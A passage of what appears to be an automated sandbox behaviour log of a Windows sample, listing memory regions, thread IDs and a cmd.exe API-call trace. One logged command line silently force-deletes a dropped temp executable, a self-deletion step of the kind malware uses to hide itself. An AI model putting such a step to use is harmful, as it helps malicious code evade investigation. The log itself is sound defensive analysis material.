0x3e50000 end_va = 0x3e56fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1812 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x3e60000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1813 start_va = 0x3e70000 end_va = 0x3e70fff entry_point = 0x3e70000 region_type = mapped_file name = "srgb color space profile.icm" filename = "\\Windows\\System32\\spool\\drivers\\color\\sRGB Color Space Profile.icm" (normalized: "c:\\windows\\system32\\spool\\drivers\\color\\srgb color space profile.icm") Region: id = 1814 start_va = 0x3e80000 end_va = 0x3ee5fff entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 1815 start_va = 0x3ef0000 end_va = 0x3f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 1816 start_va = 0x3f30000 end_va = 0x3f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f30000" filename = "" Region: id = 1817 start_va = 0x3f70000 end_va = 0x3faffff entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 1818 start_va = 0x71e50000 end_va = 0x71e58fff entry_point = 0x71e50000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Thread: id = 93 os_tid = 0xb34 Thread: id = 94 os_tid = 0x464 Thread: id = 95 os_tid = 0xb10 Thread: id = 96 os_tid = 0x9c4 Thread: id = 97 os_tid = 0x9c8 Thread: id = 98 os_tid = 0x9d0 Thread: id = 99 os_tid = 0xa70 Thread: id = 100 os_tid = 0x704 Thread: id = 101 os_tid = 0x6ec Thread: id = 102 os_tid = 0x7cc Thread: id = 103 os_tid = 0x184 Thread: id = 104 os_tid = 0x248 Thread: id = 107 os_tid = 0x2c8 Thread: id = 116 os_tid = 0xad8 Thread: id = 117 os_tid = 0x6f8 Thread: id = 118 os_tid = 0x650 Thread: id = 119 os_tid = 0x238 Thread: id = 120 os_tid = 0x254 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x219b1000" os_pid = "0x7b0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xb68" cmd_line = "cmd.exe /C del /Q /F \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010cdc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1605 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1606 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1607 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1608 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1609 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1610 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1611 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1612 start_va = 0x4aa60000 end_va = 0x4aaabfff entry_point = 0x4aa60000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1613 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1614 start_va = 0x773b0000 end_va = 0x7752ffff entry_point = 0x773b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1615 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1616 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1617 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1618 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1619 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1620 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1621 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1629 start_va = 0x430000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1630 start_va = 0x73a80000 end_va = 0x73adbfff entry_point = 0x73abf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1631 start_va = 0x73ae0000 end_va = 0x73b1efff entry_point = 0x73b0de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1632 start_va = 0x73b50000 end_va = 0x73b57fff entry_point = 0x73b520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1642 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1643 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1644 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1645 start_va = 0x5a0000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1646 start_va = 0x810000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 1647 start_va = 0x74a40000 end_va = 0x74a46fff entry_point = 0x74a40000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1648 start_va = 0x74f00000 end_va = 0x74f0bfff entry_point = 0x74f010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1649 start_va = 0x74f10000 end_va = 0x74f6ffff entry_point = 0x74f2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1650 start_va = 0x750d0000 end_va = 0x7516cfff entry_point = 0x75103fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1651 start_va = 0x751c0000 end_va = 0x751c9fff entry_point = 0x751c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1652 start_va = 0x751d0000 end_va = 0x752dffff entry_point = 0x751e32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1653 start_va = 0x755d0000 end_va = 0x7567bfff entry_point = 0x755da472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1654 start_va = 0x757e0000 end_va = 0x758cffff entry_point = 0x757f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1655 start_va = 0x75ca0000 end_va = 0x75ce5fff entry_point = 0x75ca7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1656 start_va = 0x76b20000 end_va = 0x76baffff entry_point = 0x76b36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1657 start_va = 0x76c40000 end_va = 0x76c58fff entry_point = 0x76c44975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1658 start_va = 0x76e10000 end_va = 0x76f0ffff entry_point = 0x76e2b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1659 start_va = 0x76f10000 end_va = 0x76faffff entry_point = 0x76f249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1660 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fb0000" filename = "" Region: id = 1661 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x0 region_type = private name = "private_0x00000000770b0000" filename = "" Region: id = 1662 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1663 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1664 start_va = 0x820000 end_va = 0x9a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 1665 start_va = 0x752e0000 end_va = 0x753abfff entry_point = 0x752e168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1666 start_va = 0x75b40000 end_va = 0x75b9ffff entry_point = 0x75b5158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1667 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1668 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1669 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1670 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1671 start_va = 0x9b0000 end_va = 0xb30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 1672 start_va = 0xb40000 end_va = 0x1f3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 1673 start_va = 0x1f40000 end_va = 0x2282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Thread: id = 115 os_tid = 0x348 [0116.597] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fec4 | out: lpSystemTimeAsFileTime=0x33fec4*(dwLowDateTime=0x6934a750, dwHighDateTime=0x1d31760)) [0116.597] GetCurrentProcessId () returned 0x7b0 [0116.597] GetCurrentThreadId () returned 0x348 [0116.597] GetTickCount () returned 0x24a19 [0116.597] QueryPerformanceCounter (in: lpPerformanceCount=0x33febc | out: lpPerformanceCount=0x33febc*=582074837) returned 1 [0116.598] GetModuleHandleA (lpModuleName=0x0) returned 0x4aa60000 [0116.598] __set_app_type (_Type=0x1) [0116.598] __p__fmode () returned 0x756731f4 [0116.613] __p__commode () returned 0x756731fc [0116.613] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aa821a6) returned 0x0 [0116.614] __getmainargs (in: _Argc=0x4aa84238, _Argv=0x4aa84240, _Env=0x4aa8423c, _DoWildCard=0, _StartInfo=0x4aa84140 | out: _Argc=0x4aa84238, _Argv=0x4aa84240, _Env=0x4aa8423c) returned 0 [0116.614] GetCurrentThreadId () returned 0x348 [0116.614] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x348) returned 0x60 [0116.614] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x751d0000 [0116.617] GetProcAddress (hModule=0x751d0000, lpProcName="SetThreadUILanguage") returned 0x751fa84f [0116.661] SetThreadUILanguage (LangId=0x0) returned 0x409 [0116.661] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0116.661] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x33fe54 | out: phkResult=0x33fe54*=0x0) returned 0x2 [0116.661] VirtualQuery (in: lpAddress=0x33fe8b, lpBuffer=0x33fe24, dwLength=0x1c | out: lpBuffer=0x33fe24*(BaseAddress=0x33f000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0116.661] VirtualQuery (in: lpAddress=0x240000, lpBuffer=0x33fe24, dwLength=0x1c | out: lpBuffer=0x33fe24*(BaseAddress=0x240000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0116.661] VirtualQuery (in: lpAddress=0x241000, lpBuffer=0x33fe24, dwLength=0x1c | out: lpBuffer=0x33fe24*(BaseAddress=0x241000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0116.661] VirtualQuery (in: lpAddress=0x243000, lpBuffer=0x33fe24, dwLength=0x1c | out: lpBuffer=0x33fe24*(BaseAddress=0x243000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0116.661] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x33fe24, dwLength=0x1c | out: lpBuffer=0x33fe24*(BaseAddress=0x340000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0116.661] GetConsoleOutputCP () returned 0x1b5 [0116.661] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa84260 | out: lpCPInfo=0x4aa84260) returned 1 [0116.661] SetConsoleCtrlHandler (HandlerRoutine=0x4aa7e72a, Add=1) returned 1 [0116.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.661] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0116.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa841ac | out: lpMode=0x4aa841ac) returned 1 [0116.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.662] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.662] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.662] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa841b0 | out: lpMode=0x4aa841b0) returned 1 [0116.677] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.677] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0116.677] GetEnvironmentStringsW () returned 0x5b2298* [0116.677] FreeEnvironmentStringsW (penv=0x5b2298) returned 1 [0116.677] GetEnvironmentStringsW () returned 0x5b2298* [0116.677] FreeEnvironmentStringsW (penv=0x5b2298) returned 1 [0116.677] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33edc4 | out: phkResult=0x33edc4*=0x68) returned 0x0 [0116.677] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x0, lpData=0x33edd0*=0x0, lpcbData=0x33edc8*=0x1000) returned 0x2 [0116.677] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x4, lpData=0x33edd0*=0x1, lpcbData=0x33edc8*=0x4) returned 0x0 [0116.677] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x0, lpData=0x33edd0*=0x1, lpcbData=0x33edc8*=0x1000) returned 0x2 [0116.677] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x4, lpData=0x33edd0*=0x0, lpcbData=0x33edc8*=0x4) returned 0x0 [0116.677] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x4, lpData=0x33edd0*=0x40, lpcbData=0x33edc8*=0x4) returned 0x0 [0116.677] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x4, lpData=0x33edd0*=0x40, lpcbData=0x33edc8*=0x4) returned 0x0 [0116.677] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x0, lpData=0x33edd0*=0x40, lpcbData=0x33edc8*=0x1000) returned 0x2 [0116.677] RegCloseKey (hKey=0x68) returned 0x0 [0116.677] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33edc4 | out: phkResult=0x33edc4*=0x68) returned 0x0 [0116.678] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x0, lpData=0x33edd0*=0x40, lpcbData=0x33edc8*=0x1000) returned 0x2 [0116.678] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x4, lpData=0x33edd0*=0x1, lpcbData=0x33edc8*=0x4) returned 0x0 [0116.678] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x0, lpData=0x33edd0*=0x1, lpcbData=0x33edc8*=0x1000) returned 0x2 [0116.678] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x4, lpData=0x33edd0*=0x0, lpcbData=0x33edc8*=0x4) returned 0x0 [0116.678] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x4, lpData=0x33edd0*=0x9, lpcbData=0x33edc8*=0x4) returned 0x0 [0116.678] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x4, lpData=0x33edd0*=0x9, lpcbData=0x33edc8*=0x4) returned 0x0 [0116.678] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33edcc, lpData=0x33edd0, lpcbData=0x33edc8*=0x1000 | out: lpType=0x33edcc*=0x0, lpData=0x33edd0*=0x9, lpcbData=0x33edc8*=0x1000) returned 0x2 [0116.678] RegCloseKey (hKey=0x68) returned 0x0 [0116.678] time (in: timer=0x0 | out: timer=0x0) returned 0x5995a031 [0116.678] srand (_Seed=0x5995a031) [0116.678] GetCommandLineW () returned="cmd.exe /C del /Q /F \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe\"" [0116.678] GetCommandLineW () returned="cmd.exe /C del /Q /F \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe\"" [0116.686] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa85260 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0116.686] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5b4568, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0116.687] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aa90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0116.687] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.687] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4aa90640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0116.687] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0116.687] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0116.687] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0116.687] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0116.687] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0116.687] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0116.687] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0116.687] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0116.687] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0116.687] GetEnvironmentStringsW () returned 0x5b5328* [0116.687] FreeEnvironmentStringsW (penv=0x5b5328) returned 1 [0116.687] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4aa90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0116.687] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4aa90640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0116.687] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0116.687] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0116.687] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0116.687] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0116.687] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0116.687] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0116.687] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0116.687] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0116.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x33fb90 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0116.687] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x104, lpBuffer=0x33fb90, lpFilePart=0x33fb8c | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x33fb8c*="Desktop") returned 0x19 [0116.687] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0116.687] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x33f90c | out: lpFindFileData=0x33f90c) returned 0x5b2e48 [0116.687] FindClose (in: hFindFile=0x5b2e48 | out: hFindFile=0x5b2e48) returned 1 [0116.688] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x33f90c | out: lpFindFileData=0x33f90c) returned 0x5b2e48 [0116.688] FindClose (in: hFindFile=0x5b2e48 | out: hFindFile=0x5b2e48) returned 1 [0116.688] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", lpFindFileData=0x33f90c | out: lpFindFileData=0x33f90c) returned 0x5b2e48 [0116.688] FindClose (in: hFindFile=0x5b2e48 | out: hFindFile=0x5b2e48) returned 1 [0116.688] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 0x11 [0116.688] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop")) returned 1 [0116.688] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Desktop") returned 1 [0116.688] GetEnvironmentStringsW () returned 0x5b2298* [0116.688] FreeEnvironmentStringsW (penv=0x5b2298) returned 1 [0116.688] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa85260 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop") returned 0x19 [0116.688] GetConsoleOutputCP () returned 0x1b5 [0116.688] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa84260 | out: lpCPInfo=0x4aa84260) returned 1 [0116.688] GetUserDefaultLCID () returned 0x409 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4aa84950, cchData=8 | out: lpLCData=":") returned 2 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x33fcd0, cchData=128 | out: lpLCData="0") returned 2 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x33fcd0, cchData=128 | out: lpLCData="0") returned 2 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x33fcd0, cchData=128 | out: lpLCData="1") returned 2 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aa84940, cchData=8 | out: lpLCData="/") returned 2 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aa84d80, cchData=32 | out: lpLCData="Mon") returned 4 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aa84d40, cchData=32 | out: lpLCData="Tue") returned 4 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4aa84d00, cchData=32 | out: lpLCData="Wed") returned 4 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aa84cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aa84c80, cchData=32 | out: lpLCData="Fri") returned 4 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aa84c40, cchData=32 | out: lpLCData="Sat") returned 4 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aa84c00, cchData=32 | out: lpLCData="Sun") returned 4 [0116.689] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, 